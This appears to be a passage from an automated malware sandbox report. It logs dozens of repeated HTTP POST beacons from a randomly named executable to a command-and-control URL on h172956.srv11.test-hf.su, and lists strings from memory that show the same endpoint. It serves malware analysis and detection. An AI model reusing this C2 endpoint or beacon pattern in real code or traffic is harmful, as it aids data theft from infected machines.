                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1892Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownDNS traffic detected: queries for: h172956.srv11.test-hf.su
                          Source: unknownHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.00000000055E1000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su/
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000538D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005427000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003F1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php
